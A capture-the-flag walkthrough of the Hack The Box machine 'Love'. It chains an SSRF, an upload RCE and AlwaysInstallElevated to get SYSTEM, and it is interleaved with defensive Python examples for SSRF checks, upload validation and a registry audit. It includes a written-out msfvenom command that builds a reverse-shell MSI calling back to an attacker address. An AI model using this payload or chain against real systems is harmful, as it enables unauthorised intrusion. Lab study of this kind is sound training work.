TJ_Null’s OSCP Prep – HTB – Love

This Windows machine has an SSRF vulnerability. Through the SSRF we get credentials to a web server hosting a voting system that has an upload RCE, which I’ll abuse to get a reverse shell. The user has a registry setting that allows us to install .msi files as NT AUTHORITY\SYSTEM, giving us administrator access.


I’ll start with an Nmap scan.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# nmap -p- --min-rate 10000 10.10.10.239 -oN nmap.port          
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-23 16:09 EST
Warning: 10.10.10.239 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.239
Host is up (0.069s latency).
Not shown: 65461 closed tcp ports (reset), 55 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
5000/tcp  open  upnp
5040/tcp  open  unknown
5985/tcp  open  wsman
5986/tcp  open  wsmans
7680/tcp  open  pando-pub
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# cat nmap.result
# Nmap 7.92 scan initiated Sun Jan 23 16:05:38 2022 as: nmap -sC -sV -p- --min-rate 10000 -oN nmap.result 10.10.10.239
Warning: 10.10.10.239 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.239
Host is up (0.031s latency).
Not shown: 65015 closed tcp ports (reset), 501 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2022-01-23T21:32:16+00:00; +23m28s from scanner time.
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after:  2024-04-10T14:39:19
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-01-23T13:32:03-08:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 2h23m28s, deviation: 4h00m01s, median: 23m27s
| smb2-time: 
|   date: 2022-01-23T21:32:06
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 23 16:08:49 2022 -- 1 IP address (1 host up) scanned in 191.40 seconds

I’ll note a couple of things before moving forward.

  • The domain is love.htb.
  • There is also a subdomain staging.love.htb.
  • The web server allows both HTTP and HTTPS.

love.htb

It requires a Voter’s ID, which I don’t have.

staging.love.htb

There is a “Free File Scanner” running on staging.love.htb/beta.php. This is probably vulnerable to SSRF, and through it we could list resources we otherwise wouldn’t be allowed to view.

https://love.htb

Visiting HTTPS gives us a forbidden error.

Before moving forward I like to run a Nikto scan against the web server.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# cat nikto.result
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.239
+ Target Hostname:    10.10.10.239
+ Target Port:        80
+ Start Time:         2022-01-23 16:12:03 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.3.27
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /Admin/: This might be interesting...
+ 8672 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2022-01-23 16:18:57 (GMT-5) (414 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

There is a subdirectory called /admin.

Initial Access – SSRF

SSRF is when a malicious user causes the web server to make an additional or modified HTTP request to a resource of the attacker’s choosing. Since the machine has a couple of ports open that only answer 403 Forbidden from the outside (5000 in the Nmap output), we could try to make the server request them from localhost. After some enumeration I found that making a request to http://127.0.0.1:5000 gives us credentials to the voting system’s admin panel we found earlier.
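The defensive counterpart of the above is a destination check on the "fetch this URL" feature. The following is an added example, not code from the Love box or the voting system: it allow-lists the scheme and port, resolves the hostname, and rejects any target that maps to a loopback, private, link-local or otherwise non-public address, so that `http://127.0.0.1:5000` (and aliases such as `localhost`, `[::1]`, or a decimal-encoded 127.0.0.1, all of which the resolver normalises) is refused before a request is made. The `resolver` parameter is an assumption made so the check can be tested offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed example: what an outbound-fetch feature should check before
# requesting a user-supplied URL. Only public web ports are permitted.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def resolve_all(host):
    """Resolve a hostname to every address it maps to (IPv4 and IPv6).
    Going through the resolver also normalises odd spellings of an IP
    (decimal, hex, short forms), so they are judged by what they resolve to."""
    infos = socket.getaddrinfo(host, None, type=socket.SOCK_STREAM)
    return {info[4][0] for info in infos}


def is_forbidden_address(ip):
    """True for any address the server must never be tricked into contacting."""
    addr = ipaddress.ip_address(ip)
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified)


def check_fetch_target(url, resolver=resolve_all):
    """Return (allowed, reason). `resolver` is injectable for offline tests."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        addresses = resolver(host)
    except (socket.gaierror, UnicodeError):
        return False, "host does not resolve"
    if not addresses:
        return False, "host does not resolve"
    # Every resolved address must be public; one bad A/AAAA record is enough to refuse.
    for ip in addresses:
        try:
            if is_forbidden_address(ip):
                return False, f"{host} resolves to forbidden address {ip}"
        except ValueError:
            return False, f"unparseable address {ip}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("http://127.0.0.1:5000/", "http://localhost/", "https://example.com/"):
        print(candidate, check_fetch_target(candidate))
```

The check resolves the name once and judges the result; to stop a DNS-rebinding bypass, the HTTP client should connect to the exact address that was checked (pinning it) rather than resolving the hostname a second time, and it should not follow redirects without re-running the check on each hop.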

After logging in, we are presented with an admin panel.

Shell as Phoebe

Using searchsploit we find that the voting system is vulnerable to an upload remote code execution.

Looking at the explanation for this RCE, we have to add a candidate, and it is possible to upload an arbitrary file when it asks us to upload a photo.

So first we have to create a Position.

Then I’ll add a candidate and upload a PHP reverse shell.

Visiting /images we can see that the payload is uploaded. I’ll start a netcat listener and open the shell.
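The bug exploited above is a photo upload that trusts the client's filename and stores it under the web root, where Apache executes `.php`. As an added example (not the voting system's code, and not a fix the project shipped), here is the server-side validation that would have closed it: the stored name is generated by the server, the extension is allow-listed, and the file body must actually start with the magic bytes of the claimed image type. The `MAX_BYTES` limit and the helper names are assumptions for the illustration.

```python
import os
import secrets

# Constructed example: validating an uploaded "photo" before it is stored.
# Magic bytes are checked so the body, not the client's filename, decides the type.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_BYTES = 2 * 1024 * 1024  # assumed limit for a candidate photo


class UploadRejected(ValueError):
    """Raised with a short reason whenever an upload fails validation."""


def detect_image_type(data):
    """Identify the image format from its leading bytes; None if no allowed type matches."""
    for ext, magic in ALLOWED_TYPES.items():
        if data.startswith(magic):
            return ext
    return None


def validate_upload(filename, data):
    """Return the server-chosen storage name for an accepted upload, or raise UploadRejected."""
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    base = os.path.basename(filename)
    if not base or "\x00" in base:
        raise UploadRejected("bad filename")
    # Judge by the last extension only: "x.php.jpg" is treated as ".jpg" and the body
    # must then really be a JPEG, so a PHP script cannot hide behind a double extension.
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if detect_image_type(data) != ext:
        raise UploadRejected("content does not match extension")
    if b"<?php" in data or b"<?=" in data:  # cheap tripwire against image/PHP polyglots
        raise UploadRejected("embedded PHP tag")
    # The stored name never comes from the client, so nobody gets to choose "shell.php".
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(filename, data):
    """Boolean convenience wrapper for callers that only need accept/reject."""
    try:
        validate_upload(filename, data)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    sample_png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32  # constructed, not a real image
    print(validate_upload("photo.png", sample_png))
    print(is_accepted("shell.php", b"<?php echo 'not an image'; ?>"))
```

Two deployment details matter as much as the validation: the upload directory should be served with script execution disabled (for Apache, no PHP handler for that location), and the directory listing that let the payload be found under `/images` should be turned off so stored files are reachable only by their random name.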

Shell as NT AUTHORITY\SYSTEM

I’ll use Carlos Polop’s winPEAS (winpeas.exe) to enumerate possible privilege escalation vectors.

I notice these two lines in the scan.

Reading the HackTricks link.

Great, so I’ll create a .msi payload using msfvenom and upload it to the machine.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.17 LPORT=5555 -f msi -o rev.msi

After uploading it to the machine, I’ll run the msi payload and start another netcat listener.
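The registry setting that lets a standard user install a package as SYSTEM is Windows Installer’s AlwaysInstallElevated policy, and it only takes effect when the value is 1 under both HKLM and HKCU (absent or 0 in either hive disables it). The following is an added audit script, not code from the page or from winPEAS, that reads both values on a Windows host and reports whether the condition holds; the key path and value name are the documented policy location, while the function names are my own.

```python
import sys

# Constructed example: auditing the Windows Installer AlwaysInstallElevated policy.
# Both per-machine (HKLM) and per-user (HKCU) values must be 1 for MSI packages to
# install with SYSTEM privileges for a standard user.
POLICY_SUBKEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_NAME = "AlwaysInstallElevated"


def always_install_elevated(hklm_value, hkcu_value):
    """Pure decision: True only when both values are exactly 1 (None means not set)."""
    return hklm_value == 1 and hkcu_value == 1


def read_policy_value(hive):
    """Read the DWORD from one hive; None if the key or value is absent. Windows only."""
    import winreg  # deferred: the module exists only on Windows
    try:
        with winreg.OpenKey(hive, POLICY_SUBKEY) as key:
            value, kind = winreg.QueryValueEx(key, VALUE_NAME)
    except FileNotFoundError:
        return None
    return value if kind == winreg.REG_DWORD else None


def audit():
    """Return a dict with both values and the verdict, or None when not on Windows."""
    if sys.platform != "win32":
        return None
    import winreg
    hklm = read_policy_value(winreg.HKEY_LOCAL_MACHINE)
    hkcu = read_policy_value(winreg.HKEY_CURRENT_USER)
    return {"hklm": hklm, "hkcu": hkcu,
            "exploitable": always_install_elevated(hklm, hkcu)}


if __name__ == "__main__":
    result = audit()
    if result is None:
        print("not running on Windows; nothing to read")
    elif result["exploitable"]:
        print("AlwaysInstallElevated is 1 in both hives: set both to 0 (or remove them) via policy")
    else:
        print(f"AlwaysInstallElevated is not in effect: {result}")
```

The remediation is to clear the setting in both hives through Group Policy (Computer and User Configuration, Windows Installer, "Always install with elevated privileges" disabled); leaving it set in only one hive is harmless by itself, but any later change to the other hive silently re-enables the escalation, so the audit checks both.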

What I’ve learned

  • If there is a possible SSRF vulnerability, try to make a request to internal resources to see if there is anything interesting.
  • Enumerating the registry could give us a hint at possible privesc vectors. In this instance Phoebe could install .msi files as NT AUTHORITY\SYSTEM.
  • Not every reverse shell will work right away. I had to try a couple of times to get the PHP reverse shell to give me a stable connection.
